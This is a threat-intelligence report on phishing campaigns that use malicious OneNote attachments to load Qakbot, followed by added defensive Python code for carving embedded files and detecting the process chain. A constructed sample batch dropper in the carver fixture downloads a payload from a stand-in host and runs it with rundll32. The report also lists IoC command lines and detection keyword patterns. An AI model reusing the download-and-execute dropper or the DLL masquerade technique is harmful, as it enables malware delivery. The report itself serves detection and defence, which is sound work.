In the past month, Blackpoint Cyber’s SOC caught and eliminated over a dozen instances of malicious OneNote files (.one) being used in attempts to gain initial access. Various threat actors have been observed using similar techniques. Office macros (VBA), which add features and automation to Microsoft Office products, have been used as an initial access vector for quite some time. To reduce this attack surface, Microsoft rolled out a feature change in April 2022 that blocks VBA macros by default in Office files that carry the Mark of the Web, i.e., files downloaded from the internet. When a major initial access vector is blocked, adversaries must adapt their tactics, techniques, and procedures (TTPs) to remain active.
Like many initial access vectors, the OneNote attack arrives as an attachment in a phishing email and requires the victim to open the file and click the payload for execution. The payloads observed by Blackpoint Cyber’s Adversary Pursuit Group (APG) contained scripts that download and execute additional payloads from the adversary’s server. This technique lets adversaries launch various attack types and swap payloads at will.
Technical Analysis
The APG analyzed many of the recent OneNote attacks to identify trends and use cases of the adversaries.
Figure 1 is an example of what a malicious .one file displays upon opening with Microsoft OneNote. By default, the application opens the file in Read-Only mode and explains to the victim that the additional attachments are in the cloud.
Figure 1: Example of a malicious OneNote file
Enabling edit mode on the file reveals that the “Open” button is just a text box that overlays an embedded file named “Open.cmd” (Figure 2).
Figure 2: Displaying the hidden attachment
Designed as a convenience for note-taking, OneNote allows files to be embedded as attachments. Multiple file types can be embedded in and executed from OneNote, including documents, videos, audio clips, batch scripts, HTA (HTML Application), JS (JavaScript), WSF (Windows Script File), and VBS (Visual Basic script). What was intended for convenience and ease of use has quickly been turned into an attack vector by threat actors.
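The hidden attachment in Figure 2 can be recovered without opening the file in OneNote. The following Python carver is an added example, not Blackpoint or APG tooling: it relies on the FileDataStoreObject layout from Microsoft's MS-ONESTORE specification (a 16-byte GUID header, an 8-byte little-endian length, 12 bytes of padding, the embedded bytes, and a 16-byte GUID footer) and scans a .one section for every such object. Original filenames live elsewhere in the section, so each carved blob is labelled by its content instead; the script-detection keywords, the benign magic-byte table, and the sample .one-like byte string are constructed for illustration.

```python
"""Carve embedded files out of a OneNote (.one) section file.

Added example, not Blackpoint's tooling. Layout per MS-ONESTORE 2.6.13
(FileDataStoreObject): guidHeader(16) cbLength(8) unused(4) reserved(8)
FileData(cbLength) guidFooter(16). Names are stored in other objects, so
carved blobs are classified by content, not by their original filename.
"""
import struct
import uuid
from dataclasses import dataclass

# GUIDs from MS-ONESTORE, in the little-endian byte order used on disk.
ONE_FILE_HEADER = uuid.UUID("{7B5C52E4-D88C-4DA7-AEB1-5378D02996D3}").bytes_le
FDSO_HEADER = uuid.UUID("{BDE316E7-2665-4511-A4C4-8D4D0B7A9EAC}").bytes_le
FDSO_FOOTER = uuid.UUID("{71FBA722-0F79-4A0B-BB13-899256426B24}").bytes_le


@dataclass
class EmbeddedFile:
    offset: int        # byte offset of the FileDataStoreObject header
    data: bytes        # the embedded file itself
    kind: str          # heuristic content type
    suspicious: bool   # script or PE content that OneNote would hand to a script host


# Heuristic content markers (constructed for this example). HTA is checked
# before CMD because an HTA dropper often mentions rundll32 or powershell too.
SCRIPT_MARKERS = (
    ("hta", (b"<hta:application", b"<script", b"</html")),
    ("vbs", (b"wscript.", b"createobject(", b"msgbox")),
    ("js",  (b"activexobject", b"wscript.shell", b"function(")),
    ("wsf", (b"<job", b"<package")),
    ("cmd", (b"@echo off", b"%~dp0", b"powershell", b"rundll32", b"start /", b"curl ")),
)
BENIGN_MAGIC = {
    b"\xff\xd8\xff": "jpeg", b"\x89PNG": "png", b"%PDF": "pdf",
    b"PK\x03\x04": "zip/ooxml", b"\xd0\xcf\x11\xe0": "ole",
}


def classify(data: bytes) -> tuple[str, bool]:
    """Return (kind, suspicious) for a carved blob."""
    head = data[:8]
    if head.startswith(b"MZ"):
        return "pe", True
    for magic, kind in BENIGN_MAGIC.items():
        if head.startswith(magic):
            return kind, False
    probe = data[:4096].lower()
    for kind, needles in SCRIPT_MARKERS:
        if any(n in probe for n in needles):
            return kind, True
    try:
        data[:512].decode("utf-8")
        return "text", False
    except UnicodeDecodeError:
        return "binary", False


def carve(blob: bytes) -> list[EmbeddedFile]:
    """Find every well-formed FileDataStoreObject in a .one byte string."""
    found = []
    pos = 0
    while True:
        pos = blob.find(FDSO_HEADER, pos)
        if pos < 0:
            break
        hdr_end = pos + 16
        if hdr_end + 20 > len(blob):          # not even room for the length fields
            break
        (length,) = struct.unpack_from("<Q", blob, hdr_end)
        start = hdr_end + 20                  # skip cbLength(8) + unused(4) + reserved(8)
        end = start + length
        if end + 16 > len(blob) or blob[end:end + 16] != FDSO_FOOTER:
            pos = hdr_end                     # truncated or corrupt object: keep scanning
            continue
        data = blob[start:end]
        kind, suspicious = classify(data)
        found.append(EmbeddedFile(pos, data, kind, suspicious))
        pos = end + 16
    return found


def carve_file(path: str) -> list[EmbeddedFile]:
    with open(path, "rb") as fh:
        return carve(fh.read())


def build_fdso(data: bytes) -> bytes:
    """Constructed fixture: wrap bytes in a FileDataStoreObject."""
    return FDSO_HEADER + struct.pack("<Q", len(data)) + b"\x00" * 12 + data + FDSO_FOOTER


# Constructed stand-in for a malicious section (not a real sample): file header,
# filler, a harmless PNG, then a batch dropper of the kind described above.
SAMPLE_CMD = (b"@echo off\r\n"
              b"curl -o %ProgramData%\\putty.jpg http://example.invalid/01.gif\r\n"
              b"rundll32 %ProgramData%\\putty.jpg,Wind\r\n")
SAMPLE_ONE = (ONE_FILE_HEADER + b"\x00" * 40
              + build_fdso(b"\x89PNG\r\n\x1a\n" + b"\x00" * 32)
              + b"\x00" * 16
              + build_fdso(SAMPLE_CMD))


def report(blob: bytes) -> list[str]:
    return [f"0x{f.offset:x} {f.kind} {len(f.data)}B" + (" SUSPICIOUS" if f.suspicious else "")
            for f in carve(blob)]


if __name__ == "__main__":
    for line in report(SAMPLE_ONE):
        print(line)
```

Run it against a quarantined sample with `carve_file("suspect.one")` and write out any entry flagged suspicious for analysis in an isolated VM. Because the carver keys on the object GUIDs rather than on the full section structure, it also works on damaged or partially overwritten files, which is the same reason a GUID-anchored YARA rule is a practical mail-gateway check.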
Figure 3 is an example of a deobfuscated batch script found embedded in one of the samples analyzed by the APG. This script downloads 01.gif, saves it as putty.jpg, and executes it with rundll32.exe. The APG also observed a different file hash for every download of putty.jpg, which suggests the threat actor is using automation to generate payloads.
Figure 3: Deobfuscated batch script
The putty.jpg file was a Dynamic Link Library (DLL) masquerading as an image file to evade detection. Upon execution, rundll32.exe loaded putty.jpg as a module and created the following processes before terminating itself:
wermgr.exe (Windows Problem Reporting)
    rundll32.exe injected shellcode into wermgr.exe using process hollowing, a technique that hides malicious code inside a legitimate process
msra.exe (Microsoft Remote Assistance)
    Sets multiple registry keys under “HKCU\Software\Microsoft\Yerqbqokc\”
    Creates a SearchProtocolHost.exe thread (the Windows Search indexer host for the file system)
    Queries values from the registry keys listed above
svchost.exe (Service Host)
    Sets multiple registry keys under “HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\”
    Modifies the Windows Update Orchestrator
Most of the malware samples from the OneNote attacks collected by Blackpoint’s SOC were identified as probable Qakbot attacks because their IoCs (Indicators of Compromise) matched known Qakbot activity. This was determined by antivirus detection, YARA rules, and APG analysis. Qakbot is known for process injection into legitimate processes and for using “Wind” as an exported function in its DLLs.
Conclusion
The execution of embedded OneNote payloads can have varying outcomes based on the adversary’s intent. The APG’s analysis revealed that this particular attack aimed to:
establish persistence in the registry and scheduled tasks and
set up for further payload delivery and C2 interactions.
However, other threat actors could leverage OneNote to deliver ransomware or carry out more complex attacks. Currently, manual user interaction in the form of double-clicking one of the embedded files is required to initiate the attack, as OneNote has no built-in automatic execution mechanism. It is important to remain vigilant and cautious when handling unsolicited or suspicious OneNote files to avoid falling victim to this type of attack.
After observing this tactic for user execution, the SOC deployed a rule to improve detection of these attacks. Between Feb. 1 and 16, 2023, the rule was triggered 39 times on 13 devices; the trigger count exceeds the device count because users typically execute the payload multiple times. The SOC and APG will continue to monitor for, and defend against, the malicious use of OneNote.
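The behaviours reported above (OneNote spawning a script host, rundll32.exe loading a module with an image extension and the “Wind” export, and rundll32.exe spawning wermgr.exe) map directly onto process-creation telemetry. The Python below is an added example of that detection logic and is not Blackpoint’s SOC rule: it evaluates Sysmon Event ID 1 style fields (Image, ParentImage, CommandLine) against those three behaviours. The event records, paths, and rule names are constructed for illustration, not real telemetry.

```python
"""Process-creation detections for the OneNote -> rundll32 -> wermgr chain.

Added example, not Blackpoint's SOC rule. Feeds on Sysmon Event ID 1 style
fields; the sample events at the bottom are constructed, not real telemetry.
"""
import re
from dataclasses import dataclass

# Script hosts OneNote launches when a user double-clicks an embedded .cmd/.hta/.js/.vbs/.wsf.
SCRIPT_HOSTS = {"cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe", "powershell.exe"}
# A DLL handed to rundll32 under an image extension is the masquerade seen in this campaign.
IMAGE_EXTS = (".jpg", ".jpeg", ".png", ".gif", ".bmp")
# Processes the analysis reports rundll32 creating and injecting into.
INJECTION_TARGETS = {"wermgr.exe", "msra.exe"}

# rundll32 syntax is "<module>,<export>"; tolerate quoted module paths and a quoted image path.
RUNDLL32_ARG = re.compile(
    r'rundll32(?:\.exe)?"?\s+"?(?P<module>[^",]+)"?\s*,\s*"?(?P<export>[^"\s]+)', re.I)


@dataclass
class Event:
    image: str
    parent_image: str
    command_line: str


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def detect(ev: Event) -> list[str]:
    """Return the names of every rule the event matches (empty list if benign)."""
    hits = []
    img, parent = basename(ev.image), basename(ev.parent_image)
    # 1. User execution of an embedded attachment: OneNote spawning a script host.
    if parent == "onenote.exe" and img in SCRIPT_HOSTS:
        hits.append("onenote_spawns_script_host")
    # 2. rundll32 loading an "image" as a DLL, and/or the Qakbot "Wind" export.
    if img == "rundll32.exe":
        m = RUNDLL32_ARG.search(ev.command_line)
        if m:
            module = m.group("module").strip().lower()
            if module.endswith(IMAGE_EXTS):
                hits.append("rundll32_image_extension_module")
            if m.group("export").lower() == "wind":
                hits.append("rundll32_wind_export")
    # 3. rundll32 spawning a hollowing target (wermgr.exe in the observed chain).
    if parent == "rundll32.exe" and img in INJECTION_TARGETS:
        hits.append("rundll32_spawns_injection_target")
    return hits


# Constructed events modelled on the chain described in the analysis.
SAMPLE_EVENTS = [
    Event(r"C:\Windows\System32\cmd.exe",
          r"C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE",
          r'"C:\Windows\System32\cmd.exe" /c "C:\Users\victim\AppData\Local\Temp\Open.cmd"'),
    Event(r"C:\Windows\System32\rundll32.exe", r"C:\Windows\System32\cmd.exe",
          r"rundll32.exe C:\ProgramData\index1.png,Wind"),
    Event(r"C:\Windows\System32\wermgr.exe", r"C:\Windows\System32\rundll32.exe",
          r"C:\Windows\System32\wermgr.exe"),
    # Benign control: a normal rundll32 invocation from Explorer should produce no hits.
    Event(r"C:\Windows\System32\rundll32.exe", r"C:\Windows\explorer.exe",
          r"rundll32.exe shell32.dll,Control_RunDLL"),
]


def scan(events: list[Event]) -> list[tuple[str, list[str]]]:
    return [(basename(e.image), detect(e)) for e in events]


if __name__ == "__main__":
    for image, hits in scan(SAMPLE_EVENTS):
        print(f"{image:14} {', '.join(hits) or '-'}")
```

Rule 1 fires on every double-click, which is why one device produces several triggers; rules 2 and 3 are the higher-confidence signals to page on, since legitimate rundll32 invocations name a .dll and do not parent wermgr.exe.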
Mitigation
Block all .one attachments in emails.
If the use of a OneNote attachment is required, validate the source and credibility before opening.
Neo23x0 released a YARA rule for detecting suspicious embedded file types in OneNote files.
Indicators of Compromise
Other files observed were not collected because antivirus had already quarantined or deleted them.
Initial payload OneNote files:
AgreementCancelation_367226(Feb08).one
Cancellation.one
document.one
DocumentsFolder_780693(Feb03).one
Cancelation.one
cancelation.one
Secured-Document.one
ComplaintCopy_75601(Feb01).one
Embedded OneNote attachments:
Open.cmd (Batch Script)
as2ECOj.cmd (Batch Script)
Open.hta (HTML Application Script)
document.hta (HTML Application Script)
Final payload files:
aYmyWrBC.jpg
DLL executed with “rundll32.exe C:\programdata\aYmyWrBC.jpg,Wind”
atzTG39.png
DLL executed with “rundll32.exe C:\ProgramData\atzTG39.png,Wind”
aCfzEaqD.png
Deleted prior to execution
index1.png
DLL executed with “rundll32.exe C:\ProgramData\index1.png,Wind”
IPs:
Domains:
Date published: February 20, 2023
Author: Blackpoint Cyber